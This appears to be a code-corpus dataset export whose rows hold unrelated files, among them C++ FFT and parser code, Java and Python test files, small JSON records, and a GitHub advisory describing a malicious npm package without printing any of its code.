max_stars_count
int64
301
224k
text
stringlengths
6
1.05M
token_count
int64
3
727k
318
#pragma once #ifndef OPENGM_OPERATION_NORMALIZE_HXX #define OPENGM_OPERATION_NORMALIZE_HXX #include <typeinfo> #include "opengm/opengm.hxx" #include "opengm/operations/multiplier.hxx" namespace opengm { /// Normalization w.r.t. a binary operation (e.g. Multiplier) and a unary accumulation (e.g. Integrator) struct Normalization { template<class ACC, class OP, class T> static void normalize(T& out) { typename T::ValueType v; out.template accumulate<ACC>(v); if(typeid(OP) == typeid(opengm::Multiplier) && v <= 0.00001) { return; } if(typeid(OP) == typeid(opengm::Multiplier)) { OPENGM_ASSERT(v > 0.00001); } OP::iop(v,out); } }; } // namespace opengm #endif // #ifndef OPENGM_OPERATION_NORMAIZE_HXX
340
389
/* * Copyright 2014 <NAME>, Inc. */ package gw.internal.gosu.parser.coercion; import gw.lang.parser.exceptions.ParseResultsException; import gw.lang.parser.resources.Res; import gw.test.TestClass; import gw.util.GosuTestUtil; /** */ public class CrossCastTest extends TestClass { public void testCrossCastClassToInterface() throws ParseResultsException { try { GosuTestUtil.compileExpression( "new java.awt.Button() as java.lang.Runnable" ); } catch( ParseResultsException e ) { fail( "Should have accepted cast from Button to Runnable" ); } } public void testErrantCrossCastPrimitiveToInterface() throws ParseResultsException { try { GosuTestUtil.compileExpression( "0 as int as java.lang.Runnable" ); } catch( ParseResultsException e ) { assertEquals( 1, e.getParseExceptions().size() ); assertEquals( Res.MSG_TYPE_MISMATCH, e.getParseExceptions().get( 0 ).getMessageKey() ); } } public void testErrantCrossCastFinalToInterface() throws ParseResultsException { try { GosuTestUtil.compileExpression( "new java.lang.StringBuilder() as java.lang.Runnable" ); } catch( ParseResultsException e ) { assertEquals( 1, e.getParseExceptions().size() ); assertEquals( Res.MSG_TYPE_MISMATCH, e.getParseExceptions().get( 0 ).getMessageKey() ); } } }
535
679
/************************************************************** * * Licensed to the Apache Software Foundation (ASF) under one * or more contributor license agreements. See the NOTICE file * distributed with this work for additional information * regarding copyright ownership. The ASF licenses this file * to you under the Apache License, Version 2.0 (the * "License"); you may not use this file except in compliance * with the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, * software distributed under the License is distributed on an * "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY * KIND, either express or implied. See the License for the * specific language governing permissions and limitations * under the License. * *************************************************************/ #include <precomp.h> #include "cmd_run.hxx" // NOT FULLY DEFINED SERVICES #include <cosv/file.hxx> #include <cosv/x.hxx> #include <ary/ary.hxx> #include <ary/cpp/c_gate.hxx> #include <ary/idl/i_ce.hxx> #include <ary/idl/i_gate.hxx> #include <ary/idl/i_module.hxx> #include <ary/idl/ip_ce.hxx> #include <autodoc/filecoli.hxx> #include <autodoc/parsing.hxx> #include <autodoc/prs_code.hxx> #include <autodoc/prs_docu.hxx> #include <parser/unoidl.hxx> #include <adc_cl.hxx> #include "adc_cmd_parse.hxx" #include "adc_cmds.hxx" namespace autodoc { namespace command { namespace run { Parser::Parser( const Parse & i_command ) : rCommand(i_command), pCppParser(), pCppDocuInterpreter(), pIdlParser() { } Parser::~Parser() { } bool Parser::Perform() { Cout() << "Parsing the repository " << rCommand.ReposyName() << " ..." << Endl(); try { ::ary::Repository & rAry = CommandLine::Get_().TheRepository(); rAry.Set_Title(rCommand.ReposyName()); Dyn< FileCollector_Ifc > pFiles( ParseToolsFactory().Create_FileCollector(6000) ); bool bIDL = false; bool bCpp = false; command::Parse::ProjectIterator itEnd = rCommand.ProjectsEnd(); for ( command::Parse::ProjectIterator it = rCommand.ProjectsBegin(); it != itEnd; ++it ) { uintt nCount = GatherFiles( *pFiles, *(*it) ); Cout() << nCount << " files found to parse in project " << (*it)->Name() << "." << Endl(); switch ( (*it)->Language().eLanguage ) { case command::S_LanguageInfo::idl: { Get_IdlParser().Run(*pFiles); bIDL = true; } break; case command::S_LanguageInfo::cpp: { Get_CppParser().Run( *pFiles ); bCpp = true; } break; default: Cerr() << "Project in yet unimplemented language skipped." << Endl(); } } // end for if (bCpp) { rAry.Gate_Cpp().Calculate_AllSecondaryInformation(); } if (bIDL) { rAry.Gate_Idl().Calculate_AllSecondaryInformation( rCommand.DevelopersManual_RefFilePath() ); // ::ary::idl::SecondariesPilot & // rIdl2sPilot = rAry.Gate_Idl().Secondaries(); // // rIdl2sPilot.CheckAllInterfaceBases( rAry.Gate_Idl() ); // rIdl2sPilot.Connect_Types2Ces(); // rIdl2sPilot.Gather_CrossReferences(); // // if (NOT rCommand.DevelopersManual_RefFilePath().empty()) // { // csv::File // aFile(rCommand.DevelopersManual_RefFilePath(), csv::CFM_READ); // if ( aFile.open() ) // { // rIdl2sPilot.Read_Links2DevManual(aFile); // aFile.close(); // } // } } // endif (bIDL) return true; } // end try catch (csv::Exception & xx) { xx.GetInfo(Cerr()); Cerr() << " program will exit." << Endl(); return false; } } CodeParser_Ifc & Parser::Get_CppParser() { if ( NOT pCppParser ) Create_CppParser(); return *pCppParser; } IdlParser & Parser::Get_IdlParser() { if ( NOT pIdlParser ) Create_IdlParser(); return *pIdlParser; } void Parser::Create_CppParser() { pCppParser = ParseToolsFactory().Create_Parser_Cplusplus(); pCppDocuInterpreter = ParseToolsFactory().Create_DocuParser_AutodocStyle(); pCppParser->Setup( CommandLine::Get_().TheRepository(), *pCppDocuInterpreter, CommandLine::Get_().IgnoreDefines() ); } void Parser::Create_IdlParser() { pIdlParser = new IdlParser(CommandLine::Get_().TheRepository()); } const ParseToolsFactory_Ifc & Parser::ParseToolsFactory() { return ParseToolsFactory_Ifc::GetIt_(); } uintt Parser::GatherFiles( FileCollector_Ifc & o_rFiles, const S_ProjectData & i_rProject ) { uintt ret = 0; o_rFiles.EraseAll(); typedef StringVector StrVector; typedef StrVector::const_iterator StrIterator; const S_Sources & rSources = i_rProject.Sources(); const StrVector & rExtensions = i_rProject.Language().aExtensions; StrIterator it; StrIterator itTreesEnd = rSources.aTrees.end(); StrIterator itDirsEnd = rSources.aDirectories.end(); StrIterator itFilesEnd = rSources.aFiles.end(); StrIterator itExt; StrIterator itExtEnd = rExtensions.end(); csv::StreamStr aDir(500); i_rProject.RootDirectory().Get( aDir ); uintt nProjectDir_AddPosition = ( strcmp(aDir.c_str(),".\\") == 0 OR strcmp(aDir.c_str(),"./") == 0 ) ? 0 : uintt( aDir.tellp() ); for ( it = rSources.aDirectories.begin(); it != itDirsEnd; ++it ) { aDir.seekp( nProjectDir_AddPosition ); aDir << *it; for ( itExt = rExtensions.begin(); itExt != itExtEnd; ++itExt ) { ret += o_rFiles.AddFilesFrom( aDir.c_str(), *itExt, FileCollector_Ifc::flat ); } // end for itExt } // end for it for ( it = rSources.aTrees.begin(); it != itTreesEnd; ++it ) { aDir.seekp( nProjectDir_AddPosition ); aDir << *it; for ( itExt = rExtensions.begin(); itExt != itExtEnd; ++itExt ) { ret += o_rFiles.AddFilesFrom( aDir.c_str(), *itExt, FileCollector_Ifc::recursive ); } // end for itExt } // end for it for ( it = rSources.aFiles.begin(); it != itFilesEnd; ++it ) { aDir.seekp( nProjectDir_AddPosition ); aDir << *it; o_rFiles.AddFile( aDir.c_str() ); } // end for it ret += rSources.aFiles.size(); return ret; } } // namespace run } // namespace command #if 0 inline const ParseToolsFactory_Ifc & CommandRunner::ParseToolsFactory() { return ParseToolsFactory_Ifc::GetIt_(); } inline const command::S_LanguageInfo & CommandRunner::Get_ProjectLanguage( const command::Parse & i_rCommand, const command::S_ProjectData & i_rProject ) { if ( i_rProject.pLanguage ) return *i_rProject.pLanguage; return *i_rCommand.GlobalLanguageInfo(); } inline bool CommandRunner::HasParsedCpp() const { return pCppParser; } inline bool CommandRunner::HasParsedIdl() const { return pIdlParser; } CommandRunner::CommandRunner() : pCommandLine(0), pReposy(0), pNewReposy(0), nResultCode(0) { Cout() << "\nAutodoc version 2.2.1" << "\n-------------------" << "\n" << Endl(); } CommandRunner::~CommandRunner() { ary::Repository::Destroy_(); Cout() << "\n" << Endl(); } void CommandRunner::Run( const CommandLine & i_rCL ) { ary::Repository::Destroy_(); // ary::Repository::Destroy_(); pReposy = 0; pNewReposy = 0; nResultCode = 0; pCommandLine = &i_rCL; pCommandLine->Run(); } void CommandRunner::Parse() { try { csv_assert( pCommandLine->Cmd_Parse() != 0 ); const command::Parse & rCmd = *pCommandLine->Cmd_Parse(); Cout() << "Parsing the repository " << rCmd.ReposyName() << " ..." << Endl(); if ( pReposy == 0 ) pReposy = & ary::Repository::Create_( rCmd.ReposyName(), 0 ); if ( pNewReposy == 0 ) pNewReposy = & ary::Repository::Create_( rCmd.ReposyName() ); Dyn< FileCollector_Ifc > pFiles; pFiles = ParseToolsFactory().Create_FileCollector(6000); bool bCpp = false; bool bIDL = false; command::Parse::ProjectIterator itEnd = rCmd.ProjectsEnd(); for ( command::Parse::ProjectIterator it = rCmd.ProjectsBegin(); it != itEnd; ++it ) { uintt nCount = GatherFiles( *pFiles, rCmd, *(*it) ); Cout() << nCount << " files found to parse in project " << (*it)->Name() << "." << Endl(); switch ( Get_ProjectLanguage(rCmd, *(*it)).eLanguage ) { case command::S_LanguageInfo::cpp: { Get_CppParser().Run( (*it)->Name(), (*it)->RootDirectory(), *pFiles ); bCpp = true; } break; case command::S_LanguageInfo::idl: { Get_IdlParser().Run(*pFiles); bIDL = true; } break; default: Cerr() << "Project in yet unimplemented language skipped." << Endl(); } } // end for if (bCpp) pReposy->RwGate_Cpp().Connect_AllTypes_2_TheirRelated_CodeEntites(); if (bIDL) { pNewReposy->Gate_Idl().Secondaries().Connect_Types2Ces(); pNewReposy->Gate_Idl().Secondaries().Gather_CrossReferences(); } } // end try catch (csv::Exception & xx) { xx.GetInfo(Cerr()); Cerr() << " program will exit." << Endl(); nResultCode = 1; } catch (...) { Cerr() << "Unknown exception - program will exit." << Endl(); nResultCode = 1; } } void CommandRunner::Load() { Cout() << "This would load the repository from the directory " << pCommandLine->Cmd_Load()->ReposyDir() << "." << Endl(); } void CommandRunner::Save() { Cout() << "This would save the repository into the directory " << pCommandLine->Cmd_Save()->ReposyDir() << "." << Endl(); } void CommandRunner::CreateHtml() { Cout() << "Creating HTML-output into the directory " << pCommandLine->Cmd_CreateHtml()->OutputDir() << "." << Endl(); if ( HasParsedCpp() ) CreateHtml_NewStyle(); if ( HasParsedIdl() ) CreateHtml_OldIdlStyle(); } void CommandRunner::CreateXml() { Cout() << "This would create the XML-output into the directory " << pCommandLine->Cmd_CreateXml()->OutputDir() << "." << Endl(); } CodeParser_Ifc & CommandRunner::Get_CppParser() { if ( NOT pCppParser ) Create_CppParser(); return *pCppParser; } IdlParser & CommandRunner::Get_IdlParser() { if ( NOT pIdlParser ) Create_IdlParser(); return *pIdlParser; } void CommandRunner::Create_CppParser() { pCppParser = ParseToolsFactory().Create_Parser_Cplusplus(); pCppDocuInterpreter = ParseToolsFactory().Create_DocuParser_AutodocStyle(); pCppParser->Setup( *pReposy, *pCppDocuInterpreter ); } void CommandRunner::Create_IdlParser() { pIdlParser = new IdlParser(*pNewReposy); } uintt CommandRunner::GatherFiles( FileCollector_Ifc & o_rFiles, const command::Parse & i_rCommand, const command::S_ProjectData & i_rProject ) { uintt ret = 0; o_rFiles.EraseAll(); typedef StringVector StrVector; typedef StrVector::const_iterator StrIterator; const command::S_Sources & rSources = i_rProject.aFiles; const StrVector & rExtensions = Get_ProjectLanguage(i_rCommand,i_rProject).aExtensions; StrIterator it; StrIterator itDirsEnd = rSources.aDirectories.end(); StrIterator itTreesEnd = i_rProject.aFiles.aTrees.end(); StrIterator itFilesEnd = i_rProject.aFiles.aFiles.end(); StrIterator itExt; StrIterator itExtEnd = rExtensions.end(); csv::StreamStr aDir(500); i_rProject.aRootDirectory.Get( aDir ); uintt nProjectDir_AddPosition = ( strcmp(aDir.c_str(),".\\") == 0 OR strcmp(aDir.c_str(),"./") == 0 ) ? 0 : uintt( aDir.tellp() ); for ( it = rSources.aDirectories.begin(); it != itDirsEnd; ++it ) { aDir.seekp( nProjectDir_AddPosition ); aDir << *it; for ( itExt = rExtensions.begin(); itExt != itExtEnd; ++itExt ) { ret += o_rFiles.AddFilesFrom( aDir.c_str(), *itExt, FileCollector_Ifc::flat ); } // end for itExt } // end for it for ( it = rSources.aTrees.begin(); it != itTreesEnd; ++it ) { aDir.seekp( nProjectDir_AddPosition ); aDir << *it; for ( itExt = rExtensions.begin(); itExt != itExtEnd; ++itExt ) { ret += o_rFiles.AddFilesFrom( aDir.c_str(), *itExt, FileCollector_Ifc::recursive ); } // end for itExt } // end for it for ( it = rSources.aFiles.begin(); it != itFilesEnd; ++it ) { aDir.seekp( nProjectDir_AddPosition ); aDir << *it; o_rFiles.AddFile( aDir.c_str() ); } // end for it ret += rSources.aFiles.size(); return ret; } void CommandRunner::CreateHtml_NewStyle() { const ary::cpp::DisplayGate & rGate = pReposy->DisplayGate_Cpp(); Dyn< autodoc::HtmlDisplay_UdkStd > pHtmlDisplay; pHtmlDisplay = DisplayToolsFactory_Ifc::GetIt_() .Create_HtmlDisplay_UdkStd(); pHtmlDisplay->Run( pCommandLine->Cmd_CreateHtml()->OutputDir(), rGate, DisplayToolsFactory_Ifc::GetIt_().Create_StdFrame() ); } void CommandRunner::CreateHtml_OldIdlStyle() { ary::idl::Gate & rAryGate = pNewReposy->Gate_Idl(); // Read DevManualLinkFile: // KORR_FUTURE csv::File aFile("devmanref.txt", csv::CFM_READ); if ( aFile.open() ) { rAryGate.Secondaries().Read_Links2DevManual(aFile); aFile.close(); } // New Style Output Dyn<autodoc::HtmlDisplay_Idl_Ifc> pNewDisplay; pNewDisplay = DisplayToolsFactory_Ifc::GetIt_() .Create_HtmlDisplay_Idl(); pNewDisplay->Run( pCommandLine->Cmd_CreateHtml()->OutputDir(), rAryGate, DisplayToolsFactory_Ifc::GetIt_().Create_StdFrame() ); } #endif // 0 } // namespace autodoc
7,759
11,699
<reponame>kxxt/taichi<filename>taichi/backends/metal/env_config.cpp #include "taichi/backends/metal/env_config.h" #include "taichi/lang_util.h" #include "taichi/util/environ_config.h" TLANG_NAMESPACE_BEGIN namespace metal { EnvConfig::EnvConfig() { simdgroup_enabled_ = get_environ_config("TI_USE_METAL_SIMDGROUP", /*default_value=*/1); } const EnvConfig &EnvConfig::instance() { static const EnvConfig c; return c; } } // namespace metal TLANG_NAMESPACE_END
195
308
<filename>tests/contrib/flask/web.py<gh_stars>100-1000 # -*- coding: utf-8 -*- import os from flask import Flask from flask import render_template class TestError(Exception): pass class HandleMe(Exception): pass def create_app(): """Initializes a new Flask application. This method is required to be sure each time a test is executed, the Flask app is always new and without any tracing side effect from the previous execution. """ cur_dir = os.path.dirname(os.path.realpath(__file__)) tmpl_path = os.path.join(cur_dir, "test_templates") app = Flask(__name__, template_folder=tmpl_path) @app.route("/") def index(): return "hello" @app.route("/error") def error(): raise TestError() @app.route("/handleme") def handle_me(): raise HandleMe() @app.route("/fatal") def fatal(): 1 / 0 @app.route("/tmpl") def tmpl(): return render_template("test.html", world="earth") @app.route("/tmpl/err") def tmpl_err(): return render_template("err.html") @app.route("/tmpl/render_err") def tmpl_render_err(): return render_template("render_err.html") @app.route("/child") def child(): with app._tracer.trace("child") as span: span.set_tag("a", "b") return "child" @app.route("/custom_span") def custom_span(): span = app._tracer.current_span() assert span span.resource = "overridden" return "hiya" def unicode_view(): return u"üŋïĉóđē" app.add_url_rule( u"/üŋïĉóđē", u"üŋïĉóđē", unicode_view, ) @app.errorhandler(TestError) def handle_my_exception(e): assert isinstance(e, TestError) return "error", 500 @app.errorhandler(HandleMe) def err_to_202(e): assert isinstance(e, HandleMe) return "handled", 202 return app
860
335
{ "word": "Essentialism", "definitions": [ "A belief that things have a set of characteristics which make them what they are, and that the task of science and philosophy is their discovery and expression; the doctrine that essence is prior to existence.", "The view that all children should be taught on traditional lines the ideas and methods regarded as essential to the prevalent culture.", "The view that categories of people, such as women and men, or heterosexuals and homosexuals, or members of ethnic groups, have intrinsically different and characteristic natures or dispositions." ], "parts-of-speech": "Noun" }
169
541
<filename>dspace-server-webapp/src/main/java/org/dspace/app/rest/converter/CollectionConverter.java /** * The contents of this file are subject to the license and copyright * detailed in the LICENSE and NOTICE files at the root of the source * tree and available online at * * http://www.dspace.org/license/ */ package org.dspace.app.rest.converter; import org.dspace.app.rest.model.CollectionRest; import org.dspace.content.Collection; import org.dspace.discovery.IndexableObject; import org.springframework.stereotype.Component; /** * This is the converter from/to the Collection in the DSpace API data model and * the REST data model * * @author <NAME> (andrea.bollini at 4science.it) */ @Component public class CollectionConverter extends DSpaceObjectConverter<Collection, CollectionRest> implements IndexableObjectConverter<Collection, CollectionRest> { @Override protected CollectionRest newInstance() { return new CollectionRest(); } @Override public Class<org.dspace.content.Collection> getModelClass() { return org.dspace.content.Collection.class; } @Override public boolean supportsModel(IndexableObject idxo) { return idxo.getIndexedObject() instanceof Collection; } }
399
2,854
/* * Copyright 2019 Qameta Software OÜ * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package io.qameta.allure.entity; import java.util.List; import java.util.Optional; import java.util.stream.Collector; import java.util.stream.Collectors; /** * @author <NAME> <EMAIL> * Date: 31.01.16 */ public interface WithLabels { List<Label> getLabels(); void setLabels(List<Label> labels); default <T> T findAll(LabelName name, Collector<String, ?, T> collector) { return findAll(name.value(), collector); } default <T> T findAll(String name, Collector<String, ?, T> collector) { return getLabels().stream() .filter(label -> name.equals(label.getName())) .map(Label::getValue) .collect(collector); } default List<String> findAll(LabelName name) { return findAll(name, Collectors.toList()); } default List<String> findAll(String name) { return findAll(name, Collectors.toList()); } default Optional<String> findOne(LabelName name) { return findOne(name.value()); } default Optional<String> findOne(String name) { return getLabels().stream() .filter(label -> name.equals(label.getName())) .map(Label::getValue) .findAny(); } default void addLabelIfNotExists(LabelName name, String value) { addLabelIfNotExists(name.value(), value); } default void addLabelIfNotExists(String name, String value) { if (value == null || name == null) { return; } final Optional<String> any = getLabels().stream() .map(Label::getName) .filter(name::equals) .findAny(); if (!any.isPresent()) { addLabel(name, value); } } default void addLabel(String name, String value) { getLabels().add(new Label().setName(name).setValue(value)); } }
982
362
<reponame>yuhao-su/RECIPE-TEST /** * author: UncP * date: 2018-10-05 * license: BSD-3 **/ #ifndef _mass_tree_h_ #define _mass_tree_h_ #include "mass_node.h" typedef struct mass_tree { mass_node *root; }mass_tree; mass_tree* new_mass_tree(); void free_mass_tree(mass_tree *mt); int mass_tree_put(mass_tree *mt, const void *key, uint32_t len, const void *val); void* mass_tree_get(mass_tree *mt, const void *key, uint32_t len); #ifdef Test void mass_tree_validate(mass_tree *mt); #endif // Test #endif /* _mass_tree_h_ */
246
348
{"nom":"<NAME>","circ":"5ème circonscription","dpt":"Maine-et-Loire","inscrits":1355,"abs":763,"votants":592,"blancs":45,"nuls":5,"exp":542,"res":[{"nuance":"REM","nom":"M. <NAME>","voix":360},{"nuance":"DVD","nom":"M. <NAME>","voix":182}]}
99
892
{ "schema_version": "1.2.0", "id": "GHSA-322m-p39j-r5m2", "modified": "2020-08-31T18:24:48Z", "published": "2020-09-01T18:55:37Z", "aliases": [ "CVE-2017-16128" ], "summary": "Malicious Package in npm-script-demo", "details": "The `npm-script-demo` package is a piece of malware that opens a connection to a command and control server and executed the instructions it is given.\n\nIt has been removed from the npm registry.\n\n\n## Recommendation\n\nAny computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer.\n\nThe package should be removed, but as full control of the computer has been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.", "severity": [ ], "affected": [ { "package": { "ecosystem": "npm", "name": "npm-script-demo" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" } ] } ] } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-16128" }, { "type": "WEB", "url": "https://nodesecurity.io/advisories/481" }, { "type": "WEB", "url": "https://www.npmjs.com/advisories/481" } ], "database_specific": { "cwe_ids": [ "CWE-506" ], "severity": "MODERATE", "github_reviewed": true } }
693
1,066
#ifndef KISSFFT_I32_CLASS_HH #define KISSFFT_I32_CLASS_HH #include <complex> #include <utility> #include <vector> // TODO1: substitute complex<type> (behaviour not defined for nonfloats), should be faster // TODO2: use std:: namespace // TODO3: make unittests for all ffts (c, cpp, i32) template <typename DType> struct complex_s { DType real; DType imag; }; class kissfft_i32 { private: using scalar_type = int32_t; using cpx_type = complex<int32_t>; scalar_type _scale_factor; std::size_t _nfft; bool _inverse; std::vector<cpx_type> _twiddles; std::vector<std::size_t> _stageRadix; std::vector<std::size_t> _stageRemainder; public: // scale_factor: upscale twiddle-factors otherwise they lie between 0..1 (out of range for integer) --> fixed point math kissfft_i32(const std::size_t nfft, const bool inverse, const double scale_factor = 1024.0) : _scale_factor(scalar_type(scale_factor)), _nfft(nfft), _inverse(inverse) { // fill twiddle factors _twiddles.resize(_nfft); const double phinc = (_inverse ? 2 : -2) * acos(-1.0) / _nfft; for (std::size_t i = 0; i < _nfft; ++i) { _twiddles[i] = scale_factor * exp(complex<double>(0, i * phinc)); } //factorize //start factoring out 4's, then 2's, then 3,5,7,9,... std::size_t n = _nfft; std::size_t p = 4; do { while (n % p) { switch (p) { case 4: p = 2; break; case 2: p = 3; break; default: p += 2; break; } if (p * p > n) p = n;// no more factors } n /= p; _stageRadix.push_back(p); _stageRemainder.push_back(n); } while (n > 1); } /// Calculates the complex Discrete Fourier Transform. /// /// The size of the passed arrays must be passed in the constructor. /// The sum of the squares of the absolute values in the @c dst /// array will be @c N times the sum of the squares of the absolute /// values in the @c src array, where @c N is the size of the array. /// In other words, the l_2 norm of the resulting array will be /// @c sqrt(N) times as big as the l_2 norm of the input array. /// This is also the case when the inverse flag is set in the /// constructor. Hence when applying the same transform twice, but with /// the inverse flag changed the second time, then the result will /// be equal to the original input times @c N. void transform(const cpx_type * FSrc, cpx_type * FDst, const std::size_t stage = 0, const std::size_t fstride = 1, const std::size_t in_stride = 1) const { const std::size_t p = _stageRadix[stage]; const std::size_t m = _stageRemainder[stage]; cpx_type *const Fout_beg = FDst; cpx_type *const Fout_end = FDst + p * m; if (m == 1) { do { *FDst = *FSrc; FSrc += fstride * in_stride; } while (++FDst != Fout_end); } else { do { // recursive call: // DFT of size m*p performed by doing // p instances of smaller DFTs of size m, // each one takes a decimated version of the input transform(FSrc, FDst, stage + 1, fstride * p, in_stride); FSrc += fstride * in_stride; } while ((FDst += m) != Fout_end); } FDst = Fout_beg; // recombine the p smaller DFTs switch (p) { case 2: kf_bfly2(FDst, fstride, m); break; case 3: kf_bfly3(FDst, fstride, m); break; case 4: kf_bfly4(FDst, fstride, m); break; case 5: kf_bfly5(FDst, fstride, m); break; default: kf_bfly_generic(FDst, fstride, m, p); break; } } private: void kf_bfly2(cpx_type *const Fout, const size_t fstride, const std::size_t m) const { for (std::size_t k = 0; k < m; ++k) { const cpx_type t = (Fout[m + k] * _twiddles[k * fstride]) / _scale_factor; Fout[m + k] = Fout[k] - t; Fout[k] += t; } } void kf_bfly3(cpx_type *Fout, const std::size_t fstride, const std::size_t m) const { std::size_t k = m; const std::size_t m2 = 2 * m; const cpx_type *tw1, *tw2; cpx_type scratch[5]; const cpx_type epi3 = _twiddles[fstride * m]; tw1 = tw2 = &_twiddles[0]; do { scratch[1] = (Fout[m] * *tw1) / _scale_factor; scratch[2] = (Fout[m2] * *tw2) / _scale_factor; scratch[3] = scratch[1] + scratch[2]; scratch[0] = scratch[1] - scratch[2]; tw1 += fstride; tw2 += fstride * 2; Fout[m] = Fout[0] - (scratch[3] / 2); scratch[0] *= epi3.imag(); scratch[0] /= _scale_factor; Fout[0] += scratch[3]; Fout[m2] = cpx_type(Fout[m].real() + scratch[0].imag(), Fout[m].imag() - scratch[0].real()); Fout[m] += cpx_type(-scratch[0].imag(), scratch[0].real()); ++Fout; } while (--k); } void kf_bfly4(cpx_type *const Fout, const std::size_t fstride, const std::size_t m) const { cpx_type scratch[7]; const scalar_type negative_if_inverse = _inverse ? -1 : +1; for (std::size_t k = 0; k < m; ++k) { scratch[0] = (Fout[k + m] * _twiddles[k * fstride]) / _scale_factor; scratch[1] = (Fout[k + 2 * m] * _twiddles[k * fstride * 2]) / _scale_factor; scratch[2] = (Fout[k + 3 * m] * _twiddles[k * fstride * 3]) / _scale_factor; scratch[5] = Fout[k] - scratch[1]; Fout[k] += scratch[1]; scratch[3] = scratch[0] + scratch[2]; scratch[4] = scratch[0] - scratch[2]; scratch[4] = cpx_type(scratch[4].imag() * negative_if_inverse, -scratch[4].real() * negative_if_inverse); Fout[k + 2 * m] = Fout[k] - scratch[3]; Fout[k] += scratch[3]; Fout[k + m] = scratch[5] + scratch[4]; Fout[k + 3 * m] = scratch[5] - scratch[4]; } } void kf_bfly5(cpx_type *const Fout, const std::size_t fstride, const std::size_t m) const { cpx_type *Fout0, *Fout1, *Fout2, *Fout3, *Fout4; cpx_type scratch[13]; const cpx_type ya = _twiddles[fstride * m]; const cpx_type yb = _twiddles[fstride * 2 * m]; Fout0 = Fout; Fout1 = Fout0 + m; Fout2 = Fout0 + 2 * m; Fout3 = Fout0 + 3 * m; Fout4 = Fout0 + 4 * m; for (std::size_t u = 0; u < m; ++u) { scratch[0] = *Fout0; scratch[1] = (*Fout1 * _twiddles[u * fstride]) / _scale_factor; scratch[2] = (*Fout2 * _twiddles[2 * u * fstride]) / _scale_factor; scratch[3] = (*Fout3 * _twiddles[3 * u * fstride]) / _scale_factor; scratch[4] = (*Fout4 * _twiddles[4 * u * fstride]) / _scale_factor; scratch[7] = scratch[1] + scratch[4]; scratch[10] = scratch[1] - scratch[4]; scratch[8] = scratch[2] + scratch[3]; scratch[9] = scratch[2] - scratch[3]; *Fout0 += scratch[7]; *Fout0 += scratch[8]; scratch[5] = scratch[0] + (cpx_type( scratch[7].real() * ya.real() + scratch[8].real() * yb.real(), scratch[7].imag() * ya.real() + scratch[8].imag() * yb.real() ) / _scale_factor); scratch[6] = cpx_type( scratch[10].imag() * ya.imag() + scratch[9].imag() * yb.imag(), -scratch[10].real() * ya.imag() - scratch[9].real() * yb.imag() ) / _scale_factor; *Fout1 = scratch[5] - scratch[6]; *Fout4 = scratch[5] + scratch[6]; scratch[11] = scratch[0] + (cpx_type( scratch[7].real() * yb.real() + scratch[8].real() * ya.real(), scratch[7].imag() * yb.real() + scratch[8].imag() * ya.real() ) / _scale_factor); scratch[12] = cpx_type( -scratch[10].imag() * yb.imag() + scratch[9].imag() * ya.imag(), scratch[10].real() * yb.imag() - scratch[9].real() * ya.imag() ) / _scale_factor; *Fout2 = scratch[11] + scratch[12]; *Fout3 = scratch[11] - scratch[12]; ++Fout0; ++Fout1; ++Fout2; ++Fout3; ++Fout4; } } /* perform the butterfly for one stage of a mixed radix FFT */ void kf_bfly_generic(cpx_type * const Fout, const size_t fstride, const std::size_t m, const std::size_t p) const { const cpx_type *twiddles = &_twiddles[0]; cpx_type scratchbuf[p]; for (std::size_t u = 0; u < m; ++u) { std::size_t k = u; for (std::size_t q1 = 0; q1 < p; ++q1) { scratchbuf[q1] = Fout[k]; k += m; } k = u; for (std::size_t q1 = 0; q1 < p; ++q1) { std::size_t twidx = 0; Fout[k] = scratchbuf[0]; for (std::size_t q = 1; q < p; ++q) { twidx += fstride * k; if (twidx >= _nfft) twidx -= _nfft; Fout[k] += (scratchbuf[q] * twiddles[twidx]) / _scale_factor; } k += m; } } } }; #endif
5,607
987
<gh_stars>100-1000 // // Created by XINGKAICHUN on 2021/9/14. // #include "MerkleTreeUtil.h" #include "Sha256Util.h" #include "../util/ByteUtil.h" #include "../util/MathUtil.h" namespace MerkleTreeUtil{ vector<unsigned char> calculateMerkleTreeRoot(vector<vector<unsigned char>> datas){ vector<vector<unsigned char>> tree(datas); int size = tree.size(); int levelOffset = 0; for (int levelSize = size; levelSize > 1; levelSize = (levelSize + 1) / 2) { for (int left = 0; left < levelSize; left += 2) { int right = MathUtil::min(left + 1, levelSize - 1); vector<unsigned char> leftBytes = tree[levelOffset + left]; vector<unsigned char> rightBytes = tree[levelOffset + right]; tree.push_back(Sha256Util::doubleDigest(ByteUtil::concatenate(leftBytes, rightBytes))); } levelOffset += levelSize; } return tree[tree.size()-1]; } }
438
1,056
<filename>apisupport/apisupport.ant/src/org/netbeans/modules/apisupport/project/queries/JavadocForBinaryImpl.java<gh_stars>1000+ /* * Licensed to the Apache Software Foundation (ASF) under one * or more contributor license agreements. See the NOTICE file * distributed with this work for additional information * regarding copyright ownership. The ASF licenses this file * to you under the Apache License, Version 2.0 (the * "License"); you may not use this file except in compliance * with the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, * software distributed under the License is distributed on an * "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY * KIND, either express or implied. See the License for the * specific language governing permissions and limitations * under the License. */ package org.netbeans.modules.apisupport.project.queries; import java.io.File; import java.net.MalformedURLException; import java.net.URI; import java.net.URL; import java.util.ArrayList; import java.util.Iterator; import java.util.List; import javax.swing.event.ChangeListener; import org.netbeans.api.java.queries.JavadocForBinaryQuery; import org.netbeans.api.java.queries.JavadocForBinaryQuery.Result; import org.netbeans.modules.apisupport.project.NbModuleProject; import org.netbeans.modules.apisupport.project.NbModuleType; import org.netbeans.modules.apisupport.project.universe.NbPlatform; import 